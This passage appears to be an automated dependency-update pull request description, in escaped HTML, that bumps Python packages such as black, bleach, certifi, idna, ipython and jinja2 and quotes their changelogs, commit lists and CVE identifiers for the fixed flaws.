href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21503\"\u003eCVE-2024-21503\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eThis release also fixes a bug in Black's AST safety check that allowed Black to make\nincorrect changes to certain f-strings that are valid in Python 3.12 and higher.\u003c/p\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDon't move comments along with delimiters, which could cause crashes (\u003ca href=\"https://redirect.github.com/psf/black/issues/4248\"\u003e#4248\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eStrengthen AST safety check to catch more unsafe changes to strings. Previous versions\nof Black would incorrectly format the contents of certain unusual f-strings containing\nnested strings with the same quote type. Now, Black will crash on such strings until\nsupport for the new f-string syntax is implemented. (\u003ca href=\"https://redirect.github.com/psf/black/issues/4270\"\u003e#4270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix a bug where line-ranges exceeding the last code line would not work as expected\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4273\"\u003e#4273\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix catastrophic performance on docstrings that contain large numbers of leading tab\ncharacters. This fixes\n\u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21503\"\u003eCVE-2024-21503\u003c/a\u003e.\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4278\"\u003e#4278\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eNote what happens when \u003ccode\u003e--check\u003c/code\u003e is used with \u003ccode\u003e--quiet\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/psf/black/issues/4236\"\u003e#4236\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e24.2.0\u003c/h2\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug where comments where mistakenly removed along with redundant parentheses\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4218\"\u003e#4218\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMove the \u003ccode\u003ehug_parens_with_braces_and_square_brackets\u003c/code\u003e feature to the unstable style\ndue to an outstanding crash and proposed formatting tweaks (\u003ca href=\"https://redirect.github.com/psf/black/issues/4198\"\u003e#4198\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where base expressions caused inconsistent formatting of ** in tenary\nexpression (\u003ca href=\"https://redirect.github.com/psf/black/issues/4154\"\u003e#4154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChecking for newline before adding one on docstring that is almost at the line limit\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4185\"\u003e#4185\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove redundant parentheses in \u003ccode\u003ecase\u003c/code\u003e statement \u003ccode\u003eif\u003c/code\u003e guards (\u003ca href=\"https://redirect.github.com/psf/black/issues/4214\"\u003e#4214\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eConfiguration\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/blob/main/CHANGES.md\"\u003eblack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e24.3.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cp\u003eThis release is a milestone: it fixes Black's first CVE security vulnerability. If you\nrun Black on untrusted input, or if you habitually put thousands of leading tab\ncharacters in your docstrings, you are strongly encouraged to upgrade immediately to fix\n\u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21503\"\u003eCVE-2024-21503\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eThis release also fixes a bug in Black's AST safety check that allowed Black to make\nincorrect changes to certain f-strings that are valid in Python 3.12 and higher.\u003c/p\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDon't move comments along with delimiters, which could cause crashes (\u003ca href=\"https://redirect.github.com/psf/black/issues/4248\"\u003e#4248\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eStrengthen AST safety check to catch more unsafe changes to strings. Previous versions\nof Black would incorrectly format the contents of certain unusual f-strings containing\nnested strings with the same quote type. Now, Black will crash on such strings until\nsupport for the new f-string syntax is implemented. (\u003ca href=\"https://redirect.github.com/psf/black/issues/4270\"\u003e#4270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix a bug where line-ranges exceeding the last code line would not work as expected\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4273\"\u003e#4273\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix catastrophic performance on docstrings that contain large numbers of leading tab\ncharacters. This fixes\n\u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21503\"\u003eCVE-2024-21503\u003c/a\u003e.\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4278\"\u003e#4278\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eNote what happens when \u003ccode\u003e--check\u003c/code\u003e is used with \u003ccode\u003e--quiet\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/psf/black/issues/4236\"\u003e#4236\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e24.2.0\u003c/h2\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug where comments where mistakenly removed along with redundant parentheses\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4218\"\u003e#4218\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMove the \u003ccode\u003ehug_parens_with_braces_and_square_brackets\u003c/code\u003e feature to the unstable style\ndue to an outstanding crash and proposed formatting tweaks (\u003ca href=\"https://redirect.github.com/psf/black/issues/4198\"\u003e#4198\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where base expressions caused inconsistent formatting of ** in tenary\nexpression (\u003ca href=\"https://redirect.github.com/psf/black/issues/4154\"\u003e#4154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChecking for newline before adding one on docstring that is almost at the line limit\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4185\"\u003e#4185\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove redundant parentheses in \u003ccode\u003ecase\u003c/code\u003e statement \u003ccode\u003eif\u003c/code\u003e guards (\u003ca href=\"https://redirect.github.com/psf/black/issues/4214\"\u003e#4214\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/psf/black/commits/24.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `bleach` from 3.1.5 to 3.3.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mozilla/bleach/blob/main/CHANGES\"\u003ebleach's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.3.0 (February 1st, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eclean escapes HTML comments even when strip_comments=False\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix bug 1621692 / GHSA-m6xf-fq7q-8743. See the advisory for details.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003ch2\u003eVersion 3.2.3 (January 26th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix clean and linkify raising ValueErrors for certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.2.2 (January 20th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate CI to Github Actions. Thank you \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix linkify raising an IndexError on certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/79b7a3c5e56a09d1d323a5006afa59b56162eb13\"\u003e\u003ccode\u003e79b7a3c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-vv2x-vrpj-qqpq\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/842fcb4a05e59d9a22dafb8c51865ee79d753c03\"\u003e\u003ccode\u003e842fcb4\u003c/code\u003e\u003c/a\u003e Update for v3.3.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/1334134d34397966a7f7cfebd38639e9ba2c680e\"\u003e\u003ccode\u003e1334134\u003c/code\u003e\u003c/a\u003e sanitizer: escape HTML comments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/c045a8b2a02bfb77bb9cacd5d3e5926c056074d2\"\u003e\u003ccode\u003ec045a8b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/581\"\u003e#581\u003c/a\u003e from mozilla/nit-fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/491abb06ce89012d852f4c5ab3aff8f572532611\"\u003e\u003ccode\u003e491abb0\u003c/code\u003e\u003c/a\u003e fix typo s/vnedoring/vendoring/\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/10b1c5dda8ebceffce1d8f7d66d4b309b4f8c0cf\"\u003e\u003ccode\u003e10b1c5d\u003c/code\u003e\u003c/a\u003e vendor: add html5lib-1.1.dist-info/REQUESTED\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/cd838c3b527021f2780d77718488fa03d81f08e3\"\u003e\u003ccode\u003ecd838c3\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/579\"\u003e#579\u003c/a\u003e from mozilla/validate-convert-entity-code-points\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/612b8080ada0fba45f0575bfcd4f3a0bda7bfaca\"\u003e\u003ccode\u003e612b808\u003c/code\u003e\u003c/a\u003e Update for v3.2.3 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/6879f6a67058c0d5977a8aa580b6338c9d34ff0e\"\u003e\u003ccode\u003e6879f6a\u003c/code\u003e\u003c/a\u003e html5lib_shim: validate unicode points for convert_entity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/90cb80be961aaf650ebc65b2ba2b789a2e9b129f\"\u003e\u003ccode\u003e90cb80b\u003c/code\u003e\u003c/a\u003e Update for v3.2.2 release\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mozilla/bleach/compare/v3.1.5...v3.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2020.4.5.1 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2020.04.05.1...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.9 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.9...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ipython` from 7.15.0 to 8.10.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ipython/ipython/releases\"\u003eipython's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eSee \u003ca href=\"https://pypi.org/project/ipython/\"\u003ehttps://pypi.org/project/ipython/\u003c/a\u003e\u003c/h2\u003e\n\u003cp\u003eWe do not use GitHub release anymore. Please see PyPI \u003ca href=\"https://pypi.org/project/ipython/\"\u003ehttps://pypi.org/project/ipython/\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e7.0.0-doc\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/15ea1ed5a886d6c19c1cc4856f2cf04a2a547c57\"\u003e\u003ccode\u003e15ea1ed\u003c/code\u003e\u003c/a\u003e release 8.10.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/560ad109197c0f8373865896af369bb3b36fd229\"\u003e\u003ccode\u003e560ad10\u003c/code\u003e\u003c/a\u003e DOC: Update what's new for 8.10 (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/13939\"\u003e#13939\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/7557ade0ed927475d5ab5b573d0ea4febfb22683\"\u003e\u003ccode\u003e7557ade\u003c/code\u003e\u003c/a\u003e DOC: Update what's new for 8.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/385d69325319a5972ee9b5983638e3617f21cb1f\"\u003e\u003ccode\u003e385d693\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-29gw-9793-fvw7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/e548ee23ac460a99901f1cd43b94ae84a35ec393\"\u003e\u003ccode\u003ee548ee2\u003c/code\u003e\u003c/a\u003e Swallow potential exceptions from showtraceback() (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/13934\"\u003e#13934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/0694b08b436203817059ec7e7136cf8561a6f013\"\u003e\u003ccode\u003e0694b08\u003c/code\u003e\u003c/a\u003e MAINT: mock slowest test. (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/13885\"\u003e#13885\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/865591252a67c6907fe03228b4053305715286e6\"\u003e\u003ccode\u003e8655912\u003c/code\u003e\u003c/a\u003e MAINT: mock slowest test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/a011765b44febfb11bae122d2ed7db763621ac8f\"\u003e\u003ccode\u003ea011765\u003c/code\u003e\u003c/a\u003e Isolate the attack tests with setUp and tearDown methods\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/c7a9470e540392c575aac46c3ee5cf4fe5123eb1\"\u003e\u003ccode\u003ec7a9470\u003c/code\u003e\u003c/a\u003e Add some regression tests for this change\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/fd34cf5f1f6e243243c738c6e0cf62eb682c4d68\"\u003e\u003ccode\u003efd34cf5\u003c/code\u003e\u003c/a\u003e Swallow potential exceptions from showtraceback()\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ipython/ipython/compare/7.15.0...8.10.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.11.2 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease 